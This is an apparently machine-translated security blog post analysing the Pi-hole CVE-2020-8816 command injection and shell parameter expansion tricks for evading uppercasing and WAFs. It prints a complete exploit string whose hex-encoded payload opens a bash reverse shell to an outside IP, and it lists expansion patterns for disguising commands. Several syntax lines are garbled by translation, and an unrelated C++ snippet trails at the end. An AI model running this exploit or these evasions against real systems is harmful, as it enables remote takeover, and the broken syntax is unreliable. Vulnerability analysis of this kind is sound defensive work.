Talking about shell parameter extension from cve-2020-8816

Time:2020-10-26

1. Preface

Recently, I came across the article about PI hole < = 4.3.2 Remote Code Execution Vulnerability (cve-2020-8816). The cause of the vulnerability is not very difficult, but the exp constructed in it has aroused my interest. Since PI hole code converts the parameters of command injection into uppercase, shell parameter extension is used to bypass it. After consulting relevant information, I find that this method is very flexible and can be used in command injection attacks to bypass traditional WAF.

2. Simple recurrence analysis of cve-2020-8816

We downloaded PI hole version 4.3.2 for installation. After the installation is successful, you will be prompted to visit http://pi.hole/admin In the web world. This vulnerability is an authorization command execution vulnerability. After PI hole is installed, a random password will be generated in the interface. After logging in successfully, access setting DHCP and perform command injection at MAC address in the figure below

Talking about shell parameter extension from cve-2020-8816

At this point, we fill in the parameters and grab the package, and find that the file path of the request is / Admin/ setting.php , check it out setting.php File logic: it is found that the file is mainly used to display the content and layout of the settings. It is a mixture of PHP and HTML. There is no code for saving. However, we find that scripts / PI hole / PHP is introduced in line 9 of the code/ savesettings.php

Talking about shell parameter extension from cve-2020-8816

Follow up to savesettings.php , it is found that the field value in the post parameter will be checked and judged by switch case. At this time, the field in the captured packet is DHCP, which can be followed up to 548 lines. The command injection point addmac is assigned to $Mac and is checked by the validmac method on line 556.

Talking about shell parameter extension from cve-2020-8816

We continue to follow up the validmac method, and find that as long as 12 numeric letters are matched, the success is returned. Because the start and end symbols are not set in the regular expression, any character can be inserted. Then $MAC is directly spliced into the exec method on line 604, resulting in command injection.

Talking about shell parameter extension from cve-2020-8816

However, on line 560, all characters of $Mac will be converted to uppercase. We know that commands in Linux are case sensitive. Uppercase such as “Id” and “whoamI” cannot be executed. However, functions in PHP are not case sensitive. Therefore, the author introduces the shell parameter extension method to obtain the lower case P, h, R characters through pattern matching.

Here we can intercept according to the constant in Env:

$PATH=’ /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin’

$W=${PATH##*:/}=’snap/bin’

$Y=${W%%/???}=’snap’

$P=${Y#???}=’p’

$PWD=’/var/www/html/admin’

$I=${PWD#/???/???/}

$H=${I%???/?????}

$Q=${PWD%/???/????/?????}

$R=${Q#/??}

Then we can construct exp as follows:

123456789123&&W=${PATH##\*:/}&&Y=${W%%/???}&&P=${Y#???}&&I=${PWD#/???/???/}&&H=${I%???/?????}&&Q=${PWD%/???/????/?????}&&R=${Q#/??}&&$P$H$P$IFS-$R$IFS’EXEC(HEX2BIN(“62617368202D63202762617368202D69203E26202F6465762F7463702F312E312E312E312F3930393020303E263127”));’&&

Talking about shell parameter extension from cve-2020-8816

3. Introduction to shell parameter extension

The bypass method of shell parameter extension is very interesting, which may be used to bypass WAF and so on in the exploitation of command injection vulnerability. I also inquired about the relevant information. The parameter extension definition is as follows: in the shell, curly brackets ${} can be used to wrap the parameters to prevent the string immediately following the parameters from being treated as part of the parameter variable name. Therefore, the most basic parameter expansion is ${parameter}. The common operations that can be used are as follows:

Case conversion:

${parameter ^ pattern} / / capitalize the first character matching the pattern

${parameter ^ ^ pattern} / / all characters matching pattern are capitalized

${parameter, pattern} / / convert the first character matching pattern to lowercase

${parameter,, pattern} / / convert all characters matching pattern to lowercase

Talking about shell parameter extension from cve-2020-8816

String deletion:

${parameter ා pattern} / / match the data that matches the pattern from the beginning, then the shortest data that matches the pattern will be deleted

${parameter š#ාාාාාාාාාාාාාාාාාාාා

${parameter% pattern} / / start to match the data that matches the pattern, then delete the shortest matching data

${parameter%%% pattern} / / start to match the data that matches the pattern, then delete the longest matching data

You can give a simple example, as shown in the figure below. If you know $path, you can use pattern matching to delete strings several times, leaving available characters, and then execute the ID command.

Talking about shell parameter extension from cve-2020-8816

Parameter slice:

$+ parameter:offset : length} / / intercepts the length part from the offset subscript

It is more convenient to intercept characters by slicing.

Talking about shell parameter extension from cve-2020-8816

Parameter replacement:

${parameter / pattern / String} / / replace the matching part of pattern with string

In the process of command injection, sensitive words can be deformed and bypassed in the way of substitution.

Talking about shell parameter extension from cve-2020-8816

The pattern matching pattern usually has the following symbols:

*/ / match any string

? //Match any single character

[… ]/ / match any character in the collection

After the actual test, it is found that the command execution function of PHP, Java and other languages can not fully support the shell parameter extension mode. In PHP 7.0.3 environment, use system, exec, shell_ The exec command execution method only supports the above method of string deletion, while in the Java 1.8 environment, Runtime.getRuntime (). Exec supports all of the above methods.

4. Security product solutions

Baidu security integration product has supported cve-2020-8816 detection and interception, and intelligent white model learning through AI can also effectively intercept the deformation caused by shell parameter expansion. Customers with needs can log in anquan.baidu.com contact us.

Reference link:

https://www.freebuf.com/vuls/…

https://www.gnu.org/software/…_node/Pattern-Matching.html#Pattern-Matching

https://www.gnu.org/software/…_node/Shell-Parameter-Expansion.html


This article by Baidu security original, reprint please indicate the source and the original link

Recommended Today

Mpmcqueue source code analysis (2)

About queue template <typename T, typename Allocator = AlignedAllocator<Slot<T>>> class Queue { private: static_assert(std::is_nothrow_copy_assignable<T>::value || std::is_nothrow_move_assignable<T>::value, “T must be nothrow copy or move assignable”); static_assert(std::is_nothrow_destructible<T>::value, “T must be nothrow destructible”); The first template parameter is the object type of the queue storage. The second template parameter is the memory allocator. By default, alignedallocator is used, […]